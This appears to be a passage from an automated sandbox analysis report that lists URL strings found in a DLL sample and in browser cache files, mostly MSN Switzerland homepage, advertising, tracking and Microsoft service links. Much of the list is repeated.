Source: auction[1].htm.5.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: auction[1].htm.5.dr	String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=GL2sgJIGIS_livS81ZoWU09GVJ5wwgaNXKxuYmLaHpATwdjJ
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[1].htm.5.dr	String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[1].htm.5.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: auction[1].htm.5.dr	String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=WNGUehQGIS_nMhkBJqxO1xjHDipwjlf7ZzWwtmUnd2kH
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1605773510&rver
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1605773510&rver=7.0.6730.0&am
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1605773511&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1605773510&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: auction[1].htm.5.dr	String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: auction[1].htm.5.dr	String found in binary or memory: https://r1-usc1.zemanta.com/rp/u1gklbadixog/b1_msn/3927532/30291974/XPIIAALMWETSNKPLP4A5RZ6QS7UQOT5Q
Source: auction[1].htm.5.dr	String found in binary or memory: https://r1-usc1.zemanta.com/rp/u1qgeh572kn4/b1_msn/3788882/29593540/XPIIAALMWETSNOSCMFHOJCNWRTUQOT5Q
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: auction[1].htm.5.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-verticals-shoppinghub
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: auction[1].htm.5.dr	String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=01993e53dc8d4e9880fcbea0201e39f7&r=infopane&i=2&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b6vzA.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b97RX.img?h=166&amp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9hqt.img?h=166&amp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9kTu.img?h=333&amp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=mestripe
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=topnav
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/elektronik-unterhaltung?utm_source=ms&utm_campaign=infopane-elec
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-karte
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-live
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.freundin.de/astrologie-sternzeichen-fremde-handys-ausspionieren
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/finanzen/top-stories/zahlen-sie-kontaktlos-der-aufruf-befeuert-das-bancoma
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/krawallanten-halunke-so-giftig-wird-um-die-konzerninit
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/das-l%c3%a4nderspiel-schweiz-ukraine-findet-weder-heute-noch-mo
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/einweg-masken-heissen-nicht-so-weil-man-sie-auf-den-weg-schmeis
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/gstaad-springt-f%c3%bcr-moudon-als-etappenort-ein/ar-BB1b9zw4?o
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ich-habe-immer-gemeint-dass-wir-%c3%a4lteren-den-jungen-egal-si
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/pl%c3%b6tzlich-steht-da-roger-federer-und-fragt-nach-marroni/ar
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/rechtsextreme-trainieren-und-posieren-vermummt-in-luzern/ar-BB1
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/wohl-kein-nati-spiel-am-dienstag-in-luzern/ar-BB1b5oQw?ocid=hpl
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/sport/fussball/alle-ukrainer-in-quarant%c3%a4ne-nati-spiel-von-heute-ist-a
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: auction[1].htm.5.dr	String found in binary or memory: https://www.outbrain.com/legal/privacy/de
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf
Source: auction[1].htm.5.dr	String found in binary or memory: https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&h=33
Source: auction[1].htm.5.dr	String found in binary or memory: https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&h=33
Source: 0pz1on1.dll	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 0pz1on1.dll	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 0pz1on1.dll	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: de-ch[1].htm.5.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.5.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[1].htm.5.dr	String found in binary or memory: http://popup.taboola.com/german
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.5.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: auction[1].htm.5.dr	String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=GL2sgJIGIS_livS81ZoWU09GVJ5wwgaNXKxuYmLaHpATwdjJ
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[1].htm.5.dr	String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[1].htm.5.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: auction[1].htm.5.dr	String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=WNGUehQGIS_nMhkBJqxO1xjHDipwjlf7ZzWwtmUnd2kH
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1605773510&rver
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1605773510&rver=7.0.6730.0&am
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1605773511&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1605773510&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: auction[1].htm.5.dr	String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: auction[1].htm.5.dr	String found in binary or memory: https://r1-usc1.zemanta.com/rp/u1gklbadixog/b1_msn/3927532/30291974/XPIIAALMWETSNKPLP4A5RZ6QS7UQOT5Q
Source: auction[1].htm.5.dr	String found in binary or memory: https://r1-usc1.zemanta.com/rp/u1qgeh572kn4/b1_msn/3788882/29593540/XPIIAALMWETSNOSCMFHOJCNWRTUQOT5Q
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: auction[1].htm.5.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-verticals-shoppinghub
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: auction[1].htm.5.dr	String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=01993e53dc8d4e9880fcbea0201e39f7&r=infopane&i=2&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b6vzA.img?h=27&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b97RX.img?h=166&amp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9hqt.img?h=166&amp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9kTu.img?h=333&amp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=mestripe
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=topnav
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/elektronik-unterhaltung?utm_source=ms&utm_campaign=infopane-elec
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-karte
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-live
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.freundin.de/astrologie-sternzeichen-fremde-handys-ausspionieren
